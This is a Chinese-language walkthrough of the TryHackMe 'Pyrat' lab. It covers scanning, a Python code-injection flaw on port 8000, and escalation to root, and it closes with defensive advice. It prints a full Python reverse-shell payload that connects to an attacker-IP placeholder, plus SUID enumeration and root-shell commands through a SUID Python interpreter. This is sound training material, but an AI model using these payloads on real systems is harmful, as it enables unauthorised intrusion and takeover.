TryHackMe 挑战：Pyrat 渗透测试教学指南<\/strong><\/h3>
文档目标：<\/strong> 本指南将一步步讲解如何对目标机器 “Pyrat” 进行渗透测试，从初始信息收集到最终获取 root 权限。此挑战的核心是识别并利用一个不安全的 Python HTTP 服务。<\/p>
目标技能：<\/strong> 网络扫描、服务枚举、Python 代码注入、反向 Shell 利用、Linux 权限提升。<\/p>

第一阶段：信息收集<\/strong><\/h4>
信息收集是渗透测试的第一步，目标是尽可能多地了解目标系统。<\/p>
1. 端口扫描<\/strong><\/p>
使用 nmap<\/code> 工具对目标 IP 地址进行全端口扫描，以发现开放的服务。<\/p>
nmap -sV -sC -p- <目标IP> <\/span><\/span><\/code><\/pre> -sV<\/code>: 探测服务版本。<\/li> -sC<\/code>: 使用默认脚本进行扫描。<\/li> -p-<\/code>: 扫描所有 65535 个端口。<\/li> <\/ul> 扫描结果分析：<\/strong> 根据文章，扫描结果如下：<\/p> 22\/tcp：<\/strong> 开放 SSH<\/code> 服务，运行的是 OpenSSH 8.2p1<\/code>。这通常不是首要攻击点，但可用于后续登录。<\/li> 8000\/tcp：<\/strong> 开放一个 HTTP<\/code> 服务，运行的是 SimpleHTTP\/0.6 Python\/3.11.2<\/code>。这是本次挑战的核心攻击入口。<\/li> <\/ul> 关键发现：<\/strong> Nmap 的服务指纹识别遇到了异常。它对 8000 端口的探测请求返回了 Python 的错误信息，例如：<\/p> name ‘GET’ is not defined<\/code><\/li> invalid syntax (<string>, line 1)<\/code><\/li> source code string cannot contain null bytes<\/code><\/li> <\/ul> 结论：<\/strong> 这些错误信息强烈暗示，该服务并非标准的 Web 服务器，而是一个直接执行用户输入（或某种形式请求）的 Python 应用程序<\/strong>。它将 HTTP 方法（如 GET）和请求数据当作 Python 代码来解析，但由于语法错误或未定义变量而失败。<\/p> 第二阶段：漏洞分析与利用<\/strong><\/h4> 1. 服务交互测试<\/strong><\/p> 文章提到访问 Web 页面（http:\/\/<目标IP>:8000<\/code>）后，提示使用 “更基础的连接”。这暗示需要使用原始 TCP 连接而非 HTTP 协议来与服务交互。<\/p> 使用 netcat<\/code> (nc) 工具进行测试：<\/p> nc <目标IP> 8000<\/span> <\/span><\/span><\/code><\/pre>输入 hello<\/code> 后，服务回应了 hello<\/code>。这表明服务存在一个简单的回显功能，更重要的是，它可能直接执行了我们发送的输入。<\/p> 2. 漏洞确认：Python 代码注入<\/strong><\/p> 基于 Nmap 的错误信息和交互测试，我们可以推断该服务存在 Python 代码注入漏洞<\/strong>。它很可能使用了不安全的函数，如 eval()<\/code> 或 exec()<\/code>，来处理输入数据。<\/p> 3. 获取反向 Shell<\/strong><\/p> 我们的目标是获取一个可在目标机器上执行命令的 Shell。由于服务在 8000 端口监听，我们可以构造一个 Python 反向 Shell 的 payload。<\/p> 反向 Shell 原理：<\/strong> 让目标机器主动连接至我们控制的攻击机上的一个监听端口，并将其命令 Shell 绑定到该网络连接上。<\/p> 攻击步骤：<\/strong><\/p> a. 在攻击机上启动 Netcat 监听器：<\/strong> 选择一个攻击机上未被占用的端口（例如 4444）。<\/p> nc -lvnp 4444<\/span> <\/span><\/span><\/code><\/pre> -l<\/code>: 监听模式。<\/li> -v<\/code>: 详细输出。<\/li> -n<\/code>: 不解析域名。<\/li> -p<\/code>: 指定监听端口。<\/li> <\/ul> b. 构造 Python 反向 Shell Payload：<\/strong> 标准的 Python 反向 Shell 代码如下：<\/p> import<\/span> socket,<\/span>subprocess,<\/span>os;s=<\/span>socket.<\/span>socket(socket.<\/span>AF_INET,socket.<\/span>SOCK_STREAM);s.<\/span>connect(("<攻击机IP>"<\/span>,4444<\/span>));os.<\/span>dup2(s.<\/span>fileno(),0<\/span>); os.<\/span>dup2(s.<\/span>fileno(),1<\/span>); os.<\/span>dup2(s.<\/span>fileno(),2<\/span>);subprocess.<\/span>call(["\/bin\/sh"<\/span>,"-i"<\/span>]) <\/span><\/span><\/code><\/pre>c. 通过 TCP 连接发送 Payload：<\/strong> 再次使用 netcat<\/code> 连接到目标的 8000 端口，并将上述 Python 代码作为输入发送。<\/p> nc <目标IP> 8000<\/span> <\/span><\/span><\/code><\/pre>在连接建立后，粘贴或输入整个 Python 代码块，然后按回车。<\/p> d. 获取 Shell：<\/strong> 如果漏洞利用成功，您会看到攻击机上的 Netcat 监听器收到了一个连接，并获得了目标机器的一个非特权用户（例如 www-data<\/code> 或 pyrat<\/code>）的 Shell。<\/p> $ whoami <\/span><\/span>www-data <\/span><\/span><\/code><\/pre> 第三阶段：权限提升<\/strong><\/h4> 在获得初始立足点后，下一步是提升权限至 root<\/code>。<\/p> 1. 内部信息枚举<\/strong><\/p> 在目标机器上，首先进行常规枚举，寻找配置错误、敏感文件或可利用的服务。<\/p> 常用命令：<\/p> # 检查当前用户权限<\/span> <\/span><\/span>sudo -l <\/span><\/span> <\/span><\/span># 查看系统版本和信息<\/span> <\/span><\/span>uname -a <\/span><\/span>cat \/etc\/os-release <\/span><\/span> <\/span><\/span># 查找具有 SUID 权限的可执行文件<\/span> <\/span><\/span>find \/ -perm -u=<\/span>s -type f 2>\/dev\/null <\/span><\/span> <\/span><\/span># 查找当前用户可写的文件或目录<\/span> <\/span><\/span>find \/ -writable 2>\/dev\/null | grep -v proc <\/span><\/span><\/code><\/pre>2. 关键发现与提权方法<\/strong><\/p> 根据文章内容（“提权”部分），挑战的关键在于发现一个具有 SUID<\/strong> 位设置的 Python 解释器。<\/p> SUID 位说明：<\/strong> 当一个具有 SUID 权限的可执行文件运行时，它将以文件所有者的权限<\/strong>而非执行者的权限运行。如果 python<\/code> 被设置了 SUID 且所有者为 root<\/code>，那么运行它就能获得一个 root shell。<\/p> 提权步骤：<\/strong><\/p> a. 查找 SUID 文件：<\/strong> 在目标 Shell 中执行：<\/p> find \/ -perm -u=<\/span>s -type f 2>\/dev\/null <\/span><\/span><\/code><\/pre>在结果中，您很可能会发现一个不寻常的 Python 二进制文件路径，例如 \/usr\/bin\/python3.11<\/code>（或类似版本），并且其权限中包含 s<\/code>（如 -rwsr-xr-x<\/code>）。<\/p> b. 利用 SUID Python 获取 Root Shell：<\/strong> 直接运行这个 Python 解释器，并使用 -c<\/code> 参数执行命令。因为它具有 root 权限，所以它可以生成一个 root shell。<\/p> \/usr\/bin\/python3.11 -c ‘import os; os.execl(<\/span>“\/bin\/sh”, “sh”, “-p”)<\/span>’ <\/span><\/span><\/code><\/pre>或者更简单的方式：<\/p> \/usr\/bin\/python3.11 -c ‘import os; os.setuid(<\/span>0)<\/span>; os.system(<\/span>“\/bin\/sh”)<\/span>’ <\/span><\/span><\/code><\/pre>命令解释：<\/strong><\/p> os.setuid(0)<\/code>: 将进程的有效用户 ID 设置为 0（即 root）。<\/li> os.system("\/bin\/sh")<\/code>: 启动一个 shell。由于进程已是 root 权限，这个 shell 就是 root shell。<\/li> <\/ul> c. 验证权限：<\/strong> 执行 whoami<\/code> 或 id<\/code> 命令，确认当前用户已变为 root<\/code>。<\/p> # whoami<\/span> <\/span><\/span>root <\/span><\/span><\/code><\/pre>至此，您已经成功完成了对 Pyrat 目标的渗透测试，从外部侦察到最终获得最高权限。<\/p> 总结与核心知识点<\/strong><\/h4> 服务指纹识别异常即线索：<\/strong> Nmap 等工具返回的非标准错误信息是发现自定义或易受攻击服务的重要线索。<\/li> Python 代码注入：<\/strong> 不安全的输入处理（如使用 eval\/exec<\/code>）会导致远程代码执行。<\/li> 反向 Shell：<\/strong> 是穿透网络边界（如防火墙）获取远程访问的经典技术。<\/li> Linux 权限提升 - SUID：<\/strong> 始终检查 SUID 二进制文件，特别是像 Python、Bash、Cp、Mv 这类解释器或常用命令，它们是常见的提权向量。<\/li> <\/ol> 安全建议：<\/strong><\/p> 永远不要使用 eval()<\/code> 或 exec()<\/code> 来处理不可信的用户输入。<\/li> 遵循最小权限原则，避免为不必要的文件或程序设置 SUID 位。<\/li> 定期进行系统审计和漏洞扫描。<\/li> <\/ul> 希望这份详尽的指南对您有所帮助！<\/p>